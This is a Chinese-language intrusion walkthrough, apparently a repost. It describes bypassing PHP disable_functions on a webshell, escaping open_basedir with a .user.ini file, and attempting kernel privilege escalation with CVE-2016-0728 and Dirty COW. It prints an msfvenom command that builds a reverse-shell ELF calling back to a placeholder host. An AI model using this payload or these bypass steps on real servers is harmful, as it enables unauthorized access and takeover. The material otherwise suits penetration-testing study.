0x00
正常的操作拿到webshell,在虚拟终端里输入命令都没有反应
在phpinfo里找到disable_functions函数,发现很多命令都被禁用了。
0x01绕过disable_functions
在这里一开始使用了 LD_PRELOAD绕过,发现报错了。
然后使用蚁剑自带插件成功绕过。
然后到tmp目录查找看看,找到了.sock路径。
运行生成一个.antproxy.php文件。
然后连接.antproxy.php发现这个绕过只有一会的时间就会被断开,然后想着在上传木马到靶机,进行反弹shell。
0x02进行反弹shell
使用msf生成木马,我这里使用的是监听80端口,LHOST是你要接收shell反弹回来的IP,-i 表示编码的次数。
msfvenom -p linux/x64/shell_reverse_tcp -i 5 LHOST=x.x.x.x LPORT=80 -f elf -o /root/shell.elf
然后直接把.elf木马放到目标上,在突破disable_functions的时候会有几分钟的时间可以输入命令。在自己接收反弹shell的机器上开启80监听,然后直接运行木马进行反弹。
0x03目录突破
发现有些目录是浏览不了的。
在shell目录下新建.user.ini文件添加open_basedir=:/绕过php.ini的全局限制
可以访问了。
0x04提权
查看linux内核版本大于等于2.6.22,可以尝试CVE-2016-0728 提权(网上有很多相关的文章)
一开始编译出现错误,然后修改 PATH
运行之后半天不见出来东西。。。。
然后使用脏牛的时候问题跟上面一样。不懂是那里出错了。。
上面进行了目录的突破,然后我们可以使用bash反弹。
找到文件写入bash反弹语句
端口监听时候发现也是没有得到想要的。
emmmm,在这里卡了很久,然后人家说中间换了vps。
————————————————
作者:WII-FM,原文链接:https://blog.csdn.net/kong_free/article/details/106891179
点击上方,关注公众号
如文章对你有帮助,请支持点下“赞”“在看”
本文始发于微信公众号(HACK之道):disable_functions的绕过+目录突破+提权
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论